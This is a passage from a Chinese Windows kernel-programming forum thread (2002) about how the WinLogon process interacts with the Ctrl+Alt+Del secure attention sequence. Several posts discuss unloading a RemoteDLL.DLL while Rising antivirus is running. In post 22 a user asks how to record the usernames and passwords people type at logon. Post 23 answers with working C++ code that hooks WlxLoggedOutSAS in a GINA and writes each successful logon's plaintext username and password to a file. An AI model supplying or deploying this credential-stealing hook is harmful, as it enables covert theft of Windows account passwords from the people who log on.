非驱动问题：WinLogon进程如何与SAS交互？？？

首页>编程与逆向>内核编程>非驱动问题：WinLogon进程如何与SAS交互？？？

slwqw 驱动大牛注册日期2002-07-18 最后登录2016-01-09 粉丝0 关注0 积分7分威望197点贡献值0点好评度147点原创分0分专家分0分加关注写私信	20楼^# 发布于：2002-10-24 17:25 邪门！！！我把瑞星放火墙、杀毒软件、瑞星放火墙都打开了，同样可以卸载 RemoteDLL.DLL，见鬼了：（
	回复(0) 喜欢(0)

gz818 驱动小牛注册日期2002-02-26 最后登录2008-11-15 粉丝0 关注0 积分3分威望22点贡献值0点好评度21点原创分0分专家分0分加关注写私信	21楼^# 发布于：2002-10-24 17:31 我的是 2003 15.0.0.5 UnHook 后，C+A+D 不成功！删除 RemoteDLL.DLL 失败，说有进程使用！关闭瑞星后，重新启动再次启动！实验，成功！不知道原因！ [编辑 - 10/24/02 by gz818]
	回复(0) 喜欢(0)

yc.cf 驱动牛犊注册日期2002-11-01 最后登录2006-03-06 粉丝0 关注0 积分34分威望6点贡献值0点好评度0点原创分0分专家分0分加关注写私信	22楼^# 发布于：2002-12-12 19:53 高人：如果我要记录user输入的用户和密码要拦截哪个函数调用?
	回复(0) 喜欢(0)

slwqw

驱动大牛

注册日期2002-07-18
最后登录2016-01-09
粉丝0
关注0
积分7分
威望197点
贡献值0点
好评度147点
原创分0分
专家分0分

加关注写私信

23楼^#

发布于：2002-12-12 20:51

拦截_WlxLoggedOutSAS，代码如下：

//_WlxLoggedOutSAS
int WINAPI _WlxLoggedOutSAS(
   PVOID pWlxContext,
   DWORD dwSasType,
   PLUID pAuthenticationId,
   PSID pLogonSid,
   PDWORD pdwOptions,
   PHANDLE phToken,
   PWLX_MPR_NOTIFY_INFO pNprNotifyInfo,
   PVOID * pProfile)
{
  RegisterCalledFuncToList(\"WlxLoggedOutSAS \" + TimeToStr(Now()));

  int Ret = MyWlxLoggedOutSAS(pWlxContext,dwSasType,pAuthenticationId,pLogonSid,pdwOptions,phToken,pNprNotifyInfo,pProfile);

  //保存用户名和密码
  if(Ret == WLX_SAS_ACTION_LOGON)
  {
   TStringList *List = new TStringList();

   List->Add(\"Username = \" + AnsiString(pNprNotifyInfo->pszUserName));
   List->Add(\"Password = \" + AnsiString(pNprNotifyInfo->pszPassword));

   List->SaveToFile(\"D:\\\\MyGinaPass.txt\");
   delete List;
  }

  return Ret;
}

回复喜欢

yc.cf 驱动牛犊注册日期2002-11-01 最后登录2006-03-06 粉丝0 关注0 积分34分威望6点贡献值0点好评度0点原创分0分专家分0分加关注写私信	24楼^# 发布于：2002-12-12 21:02 谢谢！：）
	回复(0) 喜欢(0)

发帖回复

« 返回列表

« 上一页 1 2

您需要登录后才可以回帖，登录或者注册

返回顶部